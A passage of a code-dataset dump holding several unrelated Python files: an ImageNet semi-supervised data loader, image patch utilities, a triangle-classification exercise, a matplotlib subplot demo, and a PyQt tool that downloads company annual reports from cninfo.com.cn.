_VAL_SUP_PATH_PAT = r'{imagenet_subset_dir}/imagenet_tv{n_val}s{val_seed}_{n_sup}_seed{subset_seed}'
class ImageNetDataSource(object):
"""ImageNet data source.
Attributes:
n_train: number of training samples
n_sup: number of supervised samples
n_val: number of validation samples
n_test: number of test samples
train_semisup_ds: Semi-supervised training dataset
train_unsup_ds: Unsupervised training dataset
train_sup_ds: Supervised training dataset
val_ds: Validation dataset
test_ds: Test dataset
n_classes: Number of classes
"""
def __init__(self, imagenet_subset_dir, n_val, n_sup, train_batch_size,
eval_batch_size, augment_twice, apply_colour_jitter=False,
greyscale_prob=0.0, load_test_set=True, image_size=224,
subset_seed=12345, val_seed=131):
if n_val == 0:
# We are using the complete ImageNet training set for traininig
# No samples are being held out for validation
# Draw unsupervised samples from complete training set
train_unsup_ds = _load_tfds_imagenet('train', TRAIN_IMAGES)
self.n_train = TRAIN_IMAGES
if n_sup == -1 or n_sup == TRAIN_IMAGES:
# All training samples are supervised
train_sup_ds = train_unsup_ds
self.n_sup = TRAIN_IMAGES
else:
sup_path = _SUP_PATH_PAT.format(
imagenet_subset_dir=imagenet_subset_dir, n_sup=n_sup,
subset_seed=subset_seed)
train_sup_ds = _load_custom_imagenet_split(sup_path)
self.n_sup = n_sup
val_ds = None
self.n_val = 0
else:
# A validation set has been requested
# Load the pickle file that tells us which file names are train / val
tvsplit_path = _VAL_TVSPLIT_PATH_PAT.format(
imagenet_subset_dir=imagenet_subset_dir, n_val=n_val,
val_seed=val_seed)
with tf.io.gfile.GFile(tvsplit_path, 'rb') as f_tvsplit:
tvsplit = pickle.load(f_tvsplit)
train_fn = tvsplit['train_fn']
# Filter the dataset to select samples in the training set
trainval_ds = _load_tfds_imagenet('train', TRAIN_IMAGES)
train_unsup_ds = _filter_tfds_by_file_name(trainval_ds, train_fn)
self.n_train = len(train_fn)
# Load the validation set from a custom dataset
val_path = _VAL_PATH_PAT.format(imagenet_subset_dir=imagenet_subset_dir,
n_val=n_val,
val_seed=val_seed)
val_ds = _load_custom_imagenet_split(val_path)
self.n_val = n_val
if n_sup == -1 or n_sup == len(train_fn):
# All training samples are supervised
train_sup_ds = train_unsup_ds
self.n_sup = len(train_fn)
else:
sup_path = _VAL_SUP_PATH_PAT.format(
imagenet_subset_dir=imagenet_subset_dir, n_val=n_val,
val_seed=val_seed, n_sup=n_sup,
subset_seed=subset_seed)
train_sup_ds = _load_custom_imagenet_split(sup_path)
self.n_sup = n_sup
train_sup_ds = train_sup_ds.repeat()
train_sup_ds = train_sup_ds.shuffle(8 * train_batch_size)
train_unsup_ds = train_unsup_ds.repeat()
train_unsup_ds = train_unsup_ds.shuffle(8 * train_batch_size)
train_semisup_ds = tf.data.Dataset.zip((train_sup_ds, train_unsup_ds))
def _augment_sup(sup_sample):
"""Augment supervised sample."""
sample = {
'sup_image': preprocess_train_image(
sup_sample['image'], apply_colour_jitter=apply_colour_jitter,
greyscale_prob=greyscale_prob, image_size=image_size),
'sup_label': sup_sample['label'],
}
return sample
def _augment_unsup_once(unsup_sample):
"""Augment unsupervised sample, single augmentation."""
unsup_x0 = preprocess_train_image(
unsup_sample['image'], apply_colour_jitter=apply_colour_jitter,
greyscale_prob=greyscale_prob, image_size=image_size)
sample = {
'unsup_image0': unsup_x0,
'unsup_image1': unsup_x0,
}
return sample
def _augment_unsup_twice(unsup_sample):
"""Augment unsupervised sample, two augmentations."""
sample = {
'unsup_image0': preprocess_train_image(
unsup_sample['image'], apply_colour_jitter=apply_colour_jitter,
greyscale_prob=greyscale_prob, image_size=image_size),
'unsup_image1': preprocess_train_image(
unsup_sample['image'], apply_colour_jitter=apply_colour_jitter,
greyscale_prob=greyscale_prob, image_size=image_size),
}
return sample
def _augment_semisup_once(sup_sample, unsup_sample):
"""Augment semi-supervised sample, single augmentation."""
unsup_x0 = preprocess_train_image(
unsup_sample['image'], apply_colour_jitter=apply_colour_jitter,
greyscale_prob=greyscale_prob, image_size=image_size)
semisup_sample = {
'sup_image': preprocess_train_image(
sup_sample['image'], apply_colour_jitter=apply_colour_jitter,
greyscale_prob=greyscale_prob, image_size=image_size),
'sup_label': sup_sample['label'],
'unsup_image0': unsup_x0,
'unsup_image1': unsup_x0,
}
return semisup_sample
def _augment_semisup_twice(sup_sample, unsup_sample):
"""Augment semi-supervised sample, two augmentations."""
semisup_sample = {
'sup_image': preprocess_train_image(
sup_sample['image'], apply_colour_jitter=apply_colour_jitter,
greyscale_prob=greyscale_prob, image_size=image_size),
'sup_label': sup_sample['label'],
'unsup_image0': preprocess_train_image(
unsup_sample['image'], apply_colour_jitter=apply_colour_jitter,
greyscale_prob=greyscale_prob, image_size=image_size),
'unsup_image1': preprocess_train_image(
unsup_sample['image'], apply_colour_jitter=apply_colour_jitter,
greyscale_prob=greyscale_prob, image_size=image_size),
}
return semisup_sample
def _process_eval_sample(x):
"""Pre-process evaluation sample."""
image = preprocess_eval_image(x['image'], image_size=image_size)
batch = {'image': image, 'label': x['label']}
return batch
if augment_twice:
train_semisup_ds = train_semisup_ds.map(_augment_semisup_twice,
num_parallel_calls=128)
train_unsup_only_ds = train_unsup_ds.map(_augment_unsup_twice,
num_parallel_calls=128)
else:
train_semisup_ds = train_semisup_ds.map(_augment_semisup_once,
num_parallel_calls=128)
train_unsup_only_ds = train_unsup_ds.map(_augment_unsup_once,
num_parallel_calls=128)
train_sup_only_ds = train_sup_ds.map(_augment_sup,
num_parallel_calls=128)
train_semisup_ds = train_semisup_ds.batch(train_batch_size,
drop_remainder=True)
train_unsup_only_ds = train_unsup_only_ds.batch(train_batch_size,
drop_remainder=True)
train_sup_only_ds = train_sup_only_ds.batch(train_batch_size,
drop_remainder=True)
train_semisup_ds = train_semisup_ds.prefetch(10)
train_unsup_only_ds = train_unsup_only_ds.prefetch(10)
train_sup_only_ds = train_sup_only_ds.prefetch(10)
self.train_semisup_ds = train_semisup_ds
self.train_unsup_ds = train_unsup_only_ds
self.train_sup_ds = train_sup_only_ds
#
# Validation set
#
if n_val > 0:
val_ds = val_ds.cache()
val_ds = val_ds.map(_process_eval_sample, num_parallel_calls=128)
val_ds = val_ds.batch(eval_batch_size)
val_ds = val_ds.repeat()
val_ds = val_ds.prefetch(10)
self.val_ds = val_ds
else:
self.val_ds = None
if load_test_set:
#
# Test set
#
test_ds = _load_tfds_imagenet('validation', TEST_IMAGES)
test_ds = test_ds.cache()
test_ds = test_ds.map(_process_eval_sample, num_parallel_calls=128)
test_ds = test_ds.batch(eval_batch_size)
test_ds = test_ds.repeat()
test_ds = test_ds.prefetch(10)
self.test_ds = test_ds
self.n_test = TEST_IMAGES
else:
self.test_ds = None
self.n_test = 0
self.n_classes = 1000
| 36.75625
| 100
| 0.677719
| 8,467
| 0.479907
| 0
| 0
| 0
| 0
| 0
| 0
| 4,472
| 0.253472
|
a2397ee156e882b19d6dbf902268121905eaf802
| 4,293
|
py
|
Python
|
utils/image.py
|
ariel415el/Efficient-GPNN
|
05f6588c3cc920e810d71fc9ed001f8915d7fc8a
|
[
"Apache-2.0"
] | 7
|
2021-11-11T22:57:14.000Z
|
2022-03-23T08:47:00.000Z
|
utils/image.py
|
ariel415el/Efficient-GPNN
|
05f6588c3cc920e810d71fc9ed001f8915d7fc8a
|
[
"Apache-2.0"
] | null | null | null |
utils/image.py
|
ariel415el/Efficient-GPNN
|
05f6588c3cc920e810d71fc9ed001f8915d7fc8a
|
[
"Apache-2.0"
] | 4
|
2021-11-18T07:24:09.000Z
|
2022-03-26T22:35:05.000Z
|
import os
import cv2
import torch
from torch.nn import functional as F
from torchvision import transforms
import torchvision.utils
def save_image(img, path):
os.makedirs(os.path.dirname(path), exist_ok=True)
torchvision.utils.save_image(torch.clip(img, -1, 1), path, normalize=True)
def cv2pt(img):
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
img = img / 255.
img = img * 2 - 1
img = torch.from_numpy(img.transpose(2, 0, 1)).float()
return img
def aspect_ratio_resize(img, max_dim=256):
h, w, c = img.shape
if max(h, w) / max_dim > 1:
img = cv2.blur(img, ksize=(5, 5))
if w > h:
h = int(h/w*max_dim)
w = max_dim
else:
w = int(w/h*max_dim)
h = max_dim
return cv2.resize(img, (w, h), interpolation=cv2.INTER_AREA)
def downscale(img, pyr_factor):
assert 0 < pyr_factor < 1
new_w = int(pyr_factor * img.shape[-1])
new_h = int(pyr_factor * img.shape[-2])
return transforms.Resize((new_h, new_w), antialias=True)(img)
def blur(img, pyr_factor):
"""Blur image by downscaling and then upscaling it back to original size"""
if pyr_factor < 1:
d_img = downscale(img, pyr_factor)
img = transforms.Resize(img.shape[-2:], antialias=True)(d_img)
return img
def get_pyramid(img, min_height, pyr_factor):
res = [img]
while True:
img = downscale(img, pyr_factor)
if img.shape[-2] < min_height:
break
res = [img] + res
# ensure smallest size is of min_height
if res[0].shape[-2] != min_height:
new_width = int(min_height * res[0].shape[-1] / float(res[0].shape[-2]))
res[0] = transforms.Resize((min_height, new_width), antialias=True)(res[0])
res = [x.unsqueeze(0) for x in res]
return res
def match_image_sizes(input, target):
"""resize and crop input image so that it has the same aspect ratio as target"""
assert(len(input.shape) == len(target.shape) and len(target.shape) == 4)
input_h, input_w = input.shape[-2:]
target_h, target_w = target.shape[-2:]
input_scale_factor = input_h / input_w
target_scale_factor = target_h / target_w
if target_scale_factor > input_scale_factor:
input = transforms.Resize((target_h, int(input_w/input_h*target_h)), antialias=True)(input)
pixels_to_cut = input.shape[-1] - target_w
if pixels_to_cut > 0:
input = input[:, :, :, int(pixels_to_cut / 2):-int(pixels_to_cut / 2)]
else:
input = transforms.Resize((int(input_h/input_w*target_w), target_w), antialias=True)(input)
pixels_to_cut = input.shape[-2] - target_h
if pixels_to_cut > 1:
input = input[:, :, int(pixels_to_cut / 2):-int(pixels_to_cut / 2)]
input = transforms.Resize(target.shape[-2:], antialias=True)(input)
return input
def extract_patches(src_img, patch_size, stride):
"""
Splits the image to overlapping patches and returns a pytorch tensor of size (N_patches, 3*patch_size**2)
"""
channels = 3
patches = F.unfold(src_img, kernel_size=patch_size, dilation=(1, 1), stride=stride, padding=(0, 0)) # shape (b, 3*p*p, N_patches)
patches = patches.squeeze(dim=0).permute((1, 0)).reshape(-1, channels * patch_size**2)
return patches
def combine_patches(patches, patch_size, stride, img_shape):
"""
Combines patches into an image by averaging overlapping pixels
:param patches: patches to be combined. pytorch tensor of shape (N_patches, 3*patch_size**2)
:param img_shape: an image of a shape that if split into patches with the given stride and patch_size will give
the same number of patches N_patches
returns an image of shape img_shape
"""
patches = patches.permute(1,0).unsqueeze(0)
combined = F.fold(patches, output_size=img_shape[-2:], kernel_size=patch_size, stride=stride)
# normal fold matrix
input_ones = torch.ones(img_shape, dtype=patches.dtype, device=patches.device)
divisor = F.unfold(input_ones, kernel_size=patch_size, dilation=(1, 1), stride=stride, padding=(0, 0))
divisor = F.fold(divisor, output_size=img_shape[-2:], kernel_size=patch_size, stride=stride)
divisor[divisor == 0] = 1.0
return (combined / divisor).squeeze(dim=0).unsqueeze(0)
| 35.775
| 133
| 0.663406
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 754
| 0.175635
|
a23aa98e817822c0db3ba0e76ac9fe51cc297075
| 486
|
py
|
Python
|
Exercism/triangle/triangle.py
|
adityaarakeri/Interview-solved
|
e924011d101621c7121f4f86d82bee089f4c1e25
|
[
"MIT"
] | 46
|
2019-10-14T01:21:35.000Z
|
2022-01-08T23:55:15.000Z
|
Exercism/triangle/triangle.py
|
Siddhant-K-code/Interview-solved
|
e924011d101621c7121f4f86d82bee089f4c1e25
|
[
"MIT"
] | 53
|
2019-10-03T17:16:43.000Z
|
2020-12-08T12:48:19.000Z
|
Exercism/triangle/triangle.py
|
Siddhant-K-code/Interview-solved
|
e924011d101621c7121f4f86d82bee089f4c1e25
|
[
"MIT"
] | 96
|
2019-10-03T18:12:10.000Z
|
2021-03-14T19:41:06.000Z
|
def is_triangle(func):
def wrapped(sides):
if any(i <= 0 for i in sides):
return False
sum_ = sum(sides)
if any(sides[i] > sum_ - sides[i] for i in range(3)):
return False
return func(sides)
return wrapped
@is_triangle
def is_equilateral(sides):
return len(set(sides)) == 1
@is_triangle
def is_isosceles(sides):
return len(set(sides)) != 3
@is_triangle
def is_scalene(sides):
return len(set(sides)) == 3
| 19.44
| 61
| 0.602881
| 0
| 0
| 0
| 0
| 207
| 0.425926
| 0
| 0
| 0
| 0
|
a23daef3bb54fa9c84f160a660ef817f0e87362d
| 499
|
py
|
Python
|
docs/user/visualization/matplotlib/pythonstyle.py
|
joelfrederico/mytools
|
7bf57c49c7dde0a8b0aa337fbd2fbd527ce7a67f
|
[
"MIT"
] | 1
|
2021-03-31T23:27:09.000Z
|
2021-03-31T23:27:09.000Z
|
docs/user/visualization/matplotlib/pythonstyle.py
|
joelfrederico/mytools
|
7bf57c49c7dde0a8b0aa337fbd2fbd527ce7a67f
|
[
"MIT"
] | null | null | null |
docs/user/visualization/matplotlib/pythonstyle.py
|
joelfrederico/mytools
|
7bf57c49c7dde0a8b0aa337fbd2fbd527ce7a67f
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import matplotlib.gridspec as gridspec
import matplotlib.pyplot as plt
import numpy as np
# Create data to plot
x = np.linspace(0, 10, 100)
y1 = np.sin(x)
y2 = np.cos(x)
# Create a grid
gs = gridspec.GridSpec(1, 2)
# Create a figure
fig = plt.figure(figsize=(16, 6))
# Create axes
ax1 = fig.add_subplot(gs[0, 0])
ax2 = fig.add_subplot(gs[0, 1])
# Plot data
ax1.plot(x, y1)
ax2.plot(x, y2)
# Rearrange figure to use all space
fig.tight_layout()
# Show figure
plt.show()
| 16.633333
| 38
| 0.695391
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 147
| 0.294589
|
a23e0e43898b8301125178c7c69d4cccc505d6ca
| 21,583
|
py
|
Python
|
StockAnalysisSystem/ui/Extension/recycled/announcement_downloader.py
|
SleepySoft/StockAnalysisSystem
|
75f95738831614f7946f85d09118e447f7ac6dc7
|
[
"Apache-2.0"
] | 138
|
2018-01-03T03:32:49.000Z
|
2022-03-12T02:57:46.000Z
|
StockAnalysisSystem/ui/Extension/recycled/announcement_downloader.py
|
SleepySoft/StockAnalysisSystem
|
75f95738831614f7946f85d09118e447f7ac6dc7
|
[
"Apache-2.0"
] | 9
|
2018-01-01T03:16:24.000Z
|
2021-05-27T09:57:24.000Z
|
StockAnalysisSystem/ui/Extension/recycled/announcement_downloader.py
|
SleepySoft/StockAnalysisSystem
|
75f95738831614f7946f85d09118e447f7ac6dc7
|
[
"Apache-2.0"
] | 50
|
2019-08-05T01:02:30.000Z
|
2022-03-07T00:52:14.000Z
|
import time
import urllib
import random
import logging
import requests
import datetime
from os import sys, path, makedirs
from PyQt5.QtCore import Qt, QTimer, QDateTime
from PyQt5.QtWidgets import QWidget, QPushButton, QVBoxLayout, QLabel, QComboBox, QDateTimeEdit, QCheckBox, QLineEdit, \
QRadioButton
root_path = path.dirname(path.dirname(path.abspath(__file__)))
from StockAnalysisSystem.core.Utility.common import *
from StockAnalysisSystem.core.Utility.ui_utility import *
from StockAnalysisSystem.core.Utility.task_queue import *
from StockAnalysisSystem.core.Utility.time_utility import *
from StockAnalysisSystem.ui.Utility.ui_context import UiContext
from StockAnalysisSystem.interface.interface import SasInterface as sasIF
from StockAnalysisSystem.core.Utility.securities_selector import SecuritiesSelector
# 20200217: It doesn't work anymore - Move to recycled
# -------------------------------------------- class AnnouncementDownloader --------------------------------------------
# -----------------------------------------------------------
# Get code from : https://github.com/gaodechen/cninfo_process
# -----------------------------------------------------------
User_Agent = [
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)",
"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)",
"Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0"
]
headers = {'Accept': 'application/json, text/javascript, */*; q=0.01',
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-HK;q=0.6,zh-TW;q=0.5",
'Host': 'www.cninfo.com.cn',
'Origin': 'http://www.cninfo.com.cn',
'Referer': 'http://www.cninfo.com.cn/new/commonUrl?url=disclosure/list/notice',
'X-Requested-With': 'XMLHttpRequest'
}
class AnnouncementDownloader:
def __init__(self):
pass
@staticmethod
def format_query_time_range(time_range: any) -> str:
if time_range is None:
return AnnouncementDownloader.format_query_time_range((years_ago(3), now()))
if isinstance(time_range, str):
return time_range
if isinstance(time_range, datetime.datetime):
return AnnouncementDownloader.format_query_time_range((time_range, time_range))
if not isinstance(time_range, (tuple, list)):
return AnnouncementDownloader.format_query_time_range(None)
if len(time_range) == 0:
return AnnouncementDownloader.format_query_time_range(None)
if len(time_range) == 1:
return AnnouncementDownloader.format_query_time_range((time_range[0], time_range[0]))
since = time_range[0]
until = time_range[1]
return '%s+~+%s' % (since.strftime('%Y-%m-%d'), until.strftime('%Y-%m-%d'))
@staticmethod
def get_szse_annual_report_pages(page: int, stock: str, time_range: any = None):
query_path = 'http://www.cninfo.com.cn/new/hisAnnouncement/query'
headers['User-Agent'] = random.choice(User_Agent) # 定义User_Agent
time_range = AnnouncementDownloader.format_query_time_range(time_range)
query = {'pageNum': page, # 页码
'pageSize': 30,
'tabName': 'fulltext',
'column': 'szse', # 深交所
'stock': stock,
'searchkey': '',
'secid': '',
'plate': 'sz',
'category': 'category_ndbg_szsh;', # 年度报告
'trade': '',
'seDate': time_range,
}
namelist = requests.post(query_path, headers=headers, data=query)
return namelist.json()['announcements']
@staticmethod
def get_sse_annual_report_pages(page: int, stock: str, time_range: any = None):
query_path = 'http://www.cninfo.com.cn/new/hisAnnouncement/query'
headers['User-Agent'] = random.choice(User_Agent) # 定义User_Agent
time_range = AnnouncementDownloader.format_query_time_range(time_range)
query = {'pageNum': page, # 页码
'pageSize': 30,
'tabName': 'fulltext',
'column': 'sse',
'stock': stock,
'searchkey': '',
'secid': '',
'plate': 'sh',
'category': 'category_ndbg_szsh;', # 年度报告
'trade': '',
'seDate': time_range
}
namelist = requests.post(query_path, headers=headers, data=query)
return namelist.json()['announcements'] # json中的年度报告信息
@staticmethod
def execute_download(report_pages, include_filter: [str] or None = None,
exclude_filter: [str] or None = None, quit_flag: [bool] = None):
if report_pages is None:
return
# download_headers = {
# 'Accept': 'application/json, text/javascript, */*; q=0.01',
# 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
# 'Accept-Encoding': 'gzip, deflate',
# 'Accept-Language': 'zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-HK;q=0.6,zh-TW;q=0.5',
# 'Host': 'www.cninfo.com.cn',
# 'Origin': 'http://www.cninfo.com.cn'
# }
# download_headers['User-Agent'] = random.choice(User_Agent)
download_path = 'http://static.cninfo.com.cn/'
for page in report_pages:
if quit_flag is not None and quit_flag[0]:
break
title = page['announcementTitle']
allowed = AnnouncementDownloader.check_filter_allowed(title, include_filter, exclude_filter)
if not allowed:
print(' %s -> Ignore' % title)
continue
print(' %s -> Download' % title)
download = download_path + page["adjunctUrl"]
file_name = AnnouncementDownloader.format_download_path(page)
if '*' in file_name:
file_name = file_name.replace('*', '')
time.sleep(random.random() * 5)
r = requests.get(download)
f = open(file_name, "wb")
f.write(r.content)
f.close()
@staticmethod
def format_download_path(page) -> str:
file_name = page['secName'] + '_' + page['announcementTitle'] + '.pdf'
file_path = path.join(root_path, 'Download', 'report', page['secCode'])
makedirs(file_path, exist_ok=True)
return path.join(file_path, file_name)
@staticmethod
def check_filter_allowed(text: str, include_filter: [str] or None, exclude_filter: [str] or None) -> bool:
allowed = False
if include_filter is not None and len(include_filter) > 0:
for inc in include_filter:
if inc in text:
allowed = True
break
else:
allowed = True
if exclude_filter is not None and len(exclude_filter) > 0:
for exc in exclude_filter:
if exc in text:
allowed = False
break
return allowed
# ----------------------------------------- Interface -----------------------------------------
@staticmethod
def download_annual_report(stock_identity: str or list, time_range: any = None, quit_flag: [bool] = None):
if not isinstance(stock_identity, (list, tuple)):
stock_identity = [stock_identity]
for identity in stock_identity:
s, f = AnnouncementDownloader.__detect_stock_code_and_page_entry(identity)
AnnouncementDownloader.__download_report_for_securities(s, f, time_range, quit_flag)
@staticmethod
def __detect_stock_code_and_page_entry(stock_identity: str) -> tuple:
if stock_identity.endswith('.SSE'):
s = stock_identity[: -4]
f = AnnouncementDownloader.get_sse_annual_report_pages
elif stock_identity.endswith('.SZSE'):
s = stock_identity[: -5]
f = AnnouncementDownloader.get_szse_annual_report_pages
else:
s = stock_identity
exchange = get_stock_exchange(stock_identity)
if exchange == 'SSE':
f = AnnouncementDownloader.get_sse_annual_report_pages
elif exchange == 'SZSE':
f = AnnouncementDownloader.get_szse_annual_report_pages
else:
f = AnnouncementDownloader.get_sse_annual_report_pages
return s, f
@staticmethod
def __download_report_for_securities(s, f, time_range, quit_flag):
page = 1
while page < 1000: # Max limit
if quit_flag is not None and quit_flag[0]:
break
try:
print('Downloading report for %s, page %s' % (s, page))
page_data = f(page, s, time_range)
if len(page_data) == 0:
break
AnnouncementDownloader.execute_download(page_data,
include_filter=['年年度报告'],
exclude_filter=['确认意见', '摘要', '已取消'],
quit_flag=quit_flag)
if len(page_data) != 30:
break
except Exception as e:
print(e)
print('Maybe page reaches end.')
break
finally:
page += 1
# ----------------------------------------------------------------------------------------------------------------------
ALL_STOCK_TEXT = '所有'
DEFAULT_INFO = '''
本扩展程序功能:从巨朝网下载上市公司公开报告
1.下载代码来自:https://github.com/gaodechen/cninfo_process
2.如果选择“自定义”,请自行设置关键字以根据报告标题进行过滤
3.默认下载路径为当前目录下Download/report/
4.下载任务会占用系统工作队列,和数据更新功能共享资源
- 请在“View->任务管理”中管理下载任务
- 在前一个任务没完成时,也可以添加下一个任务
5.如果选择时间范围过大或股票过多,可能会被网站BAN,切勿贪多
'''
DOWNLOAD_ALL_TIPS = '''
接下来的操作会为所有股票下载年报
这会花费很长的时间以及占用很大的磁盘空间
********并存在被网站BAN的可能性********
如非特别需要,建议选择个别股票分别下载
-------------是否继续此操作-------------
'''
# ----------------------------------- UpdateTask -----------------------------------
class AnnouncementDownloadTask(TaskQueue.Task):
REPORT_TYPE_NONE = 0
REPORT_TYPE_ANNUAL = 1
def __init__(self):
super(AnnouncementDownloadTask, self).__init__('AnnouncementDownloadTask')
self.__quit_flag = [False]
# Modules
self.sas_if: sasIF = None
self.task_manager: TaskQueue = None
# self.data_utility = None
# Parameters
self.securities = ''
self.period_since = None
self.period_until = None
self.filter_include = []
self.filter_exclude = []
self.report_type = AnnouncementDownloadTask.REPORT_TYPE_ANNUAL
def run(self):
try:
self.__execute_update()
except Exception as e:
print(e)
print('Continue...')
finally:
print('Finished')
def quit(self):
self.__quit_flag[0] = True
def identity(self) -> str:
return 'Download Report: ' + self.securities
def __execute_update(self):
if self.securities == ALL_STOCK_TEXT:
stock_list = self.sas_if.sas_get_stock_info_list()
for stock_identity, stock_name in stock_list:
if self.__quit_flag is not None and self.__quit_flag[0]:
break
# self.__build_sub_update(stock_identity)
AnnouncementDownloader.download_annual_report(stock_identity, (self.period_since, self.period_until),
self.__quit_flag)
elif self.report_type == AnnouncementDownloadTask.REPORT_TYPE_ANNUAL:
AnnouncementDownloader.download_annual_report(self.securities, (self.period_since, self.period_until),
self.__quit_flag)
else:
pass
# def __build_sub_update(self, securities: str):
# task = AnnouncementDownloadTask()
# task.securities = securities
# task.period_since = self.period_since
# task.period_until = self.period_until
# task.filter_include = self.filter_include
# task.filter_exclude = self.filter_exclude
# task.report_type = self.report_type
# task.task_manager = self.task_manager
# self.task_manager.append_task(task)
# ----------------------------- AnnouncementDownloaderUi -----------------------------
class AnnouncementDownloaderUi(QWidget):
def __init__(self, sas_if: sasIF, task_manager):
super(AnnouncementDownloaderUi, self).__init__()
# ---------------- ext var ----------------
self.__sas_if = sas_if
# self.__data_center = self.__data_hub.get_data_center() if self.__data_hub is not None else None
# self.__data_utility = self.__data_hub.get_data_utility() if self.__data_hub is not None else None
self.__task_manager = task_manager
self.__translate = QtCore.QCoreApplication.translate
# Timer for update stock list
self.__timer = QTimer()
self.__timer.setInterval(1000)
self.__timer.timeout.connect(self.on_timer)
self.__timer.start()
# Ui component
self.__combo_name = SecuritiesSelector(self.__sas_if, self)
self.__radio_annual_report = QRadioButton('年报')
self.__radio_customize_filter = QRadioButton('自定义')
self.__line_filter_include = QLineEdit()
self.__line_filter_exclude = QLineEdit()
self.__button_download = QPushButton('确定')
self.__datetime_since = QDateTimeEdit(QDateTime.currentDateTime().addYears(-3))
self.__datetime_until = QDateTimeEdit(QDateTime.currentDateTime())
self.init_ui()
# ---------------------------------------------------- UI Init -----------------------------------------------------
def init_ui(self):
self.__layout_control()
self.__config_control()
def __layout_control(self):
main_layout = QVBoxLayout()
self.setLayout(main_layout)
main_layout.addLayout(horizon_layout([QLabel('股票代码'), self.__combo_name], [1, 10]))
main_layout.addLayout(horizon_layout([QLabel('报告起始'), self.__datetime_since], [1, 10]))
main_layout.addLayout(horizon_layout([QLabel('报告截止'), self.__datetime_until], [1, 10]))
main_layout.addLayout(horizon_layout([QLabel('报告类型'), self.__radio_annual_report,
self.__radio_customize_filter], [1, 5, 5]))
main_layout.addLayout(horizon_layout([QLabel('包含词条(以,分隔)'), self.__line_filter_include], [1, 10]))
main_layout.addLayout(horizon_layout([QLabel('排除词条(以,分隔)'), self.__line_filter_exclude], [1, 10]))
main_layout.addWidget(QLabel(DEFAULT_INFO))
main_layout.addWidget(self.__button_download)
def __config_control(self):
# self.__combo_name.setEditable(True)
# self.__combo_name.addItem('所有')
# self.__combo_name.addItem('股票列表载入中')
self.__radio_annual_report.setChecked(True)
self.__line_filter_include.setEnabled(False)
self.__line_filter_exclude.setEnabled(False)
self.__radio_customize_filter.setEnabled(False)
self.__radio_annual_report.clicked.connect(self.on_radio_report_type)
self.__radio_customize_filter.clicked.connect(self.on_radio_report_type)
self.__button_download.clicked.connect(self.on_button_download)
def on_timer(self):
if self.__combo_name.count() > 1:
self.__combo_name.insertItem(0, ALL_STOCK_TEXT)
self.__combo_name.setCurrentIndex(0)
self.__timer.stop()
# # Check stock list ready and update combobox
# if self.__data_utility is not None:
# if self.__data_utility.stock_cache_ready():
# self.__combo_name.clear()
# self.__combo_name.addItem(ALL_STOCK_TEXT)
# stock_list = self.__data_utility.get_stock_list()
# for stock_identity, stock_name in stock_list:
# self.__combo_name.addItem(stock_identity + ' | ' + stock_name, stock_identity)
def on_radio_report_type(self):
if self.__radio_annual_report.isChecked():
self.__line_filter_include.setEnabled(False)
self.__line_filter_exclude.setEnabled(False)
else:
self.__line_filter_include.setEnabled(True)
self.__line_filter_exclude.setEnabled(True)
def on_button_download(self):
# input_securities = self.__combo_name.currentText()
# if '|' in input_securities:
# input_securities = input_securities.split('|')[0].strip()
input_securities = self.__combo_name.get_input_securities()
if input_securities == ALL_STOCK_TEXT:
if self.__sas_if is None:
QMessageBox.information(self,
QtCore.QCoreApplication.translate('main', '提示'),
QtCore.QCoreApplication.translate('main', '无法获取股票列表'),
QMessageBox.Yes, QMessageBox.No)
return
reply = QMessageBox.question(self,
QtCore.QCoreApplication.translate('main', '操作确认'),
QtCore.QCoreApplication.translate('main', DOWNLOAD_ALL_TIPS),
QMessageBox.Yes | QMessageBox.No,
QMessageBox.No)
if reply != QMessageBox.Yes:
return
self.__build_download_task(input_securities)
def __build_download_task(self, securities: str):
task = AnnouncementDownloadTask()
task.securities = securities
task.period_since = self.__datetime_since.dateTime().toPyDateTime()
task.period_until = self.__datetime_until.dateTime().toPyDateTime()
task.filter_include = self.__line_filter_include.text().split(',')
task.filter_exclude = self.__line_filter_exclude.text().split(',')
task.report_type = \
AnnouncementDownloadTask.REPORT_TYPE_ANNUAL \
if self.__radio_annual_report.isChecked() else \
AnnouncementDownloadTask.REPORT_TYPE_NONE
task.task_manager = self.__task_manager
task.sas_if = self.__sas_if
# task.data_utility = self.__data_utility
if self.__task_manager is not None:
self.__task_manager.append_task(task)
else:
task.run()
# ----------------------------------------------------------------------------------------------------------------------
def plugin_prob() -> dict:
return {
'plugin_id': 'efa60977-65e9-4ecf-9271-7c6e629da399',
'plugin_name': 'ReportDownloader',
'plugin_version': '0.0.0.1',
'tags': ['Announcement', 'Report', 'Finance Report', 'Annual Report', 'Sleepy'],
}
def plugin_adapt(method: str) -> bool:
return method in ['widget']
def plugin_capacities() -> list:
return ['widget']
# ----------------------------------------------------------------------------------------------------------------------
sasInterface = None
def init(sas_if) -> bool:
try:
global sasInterface
sasInterface = sas_if
except Exception as e:
pass
finally:
pass
return True
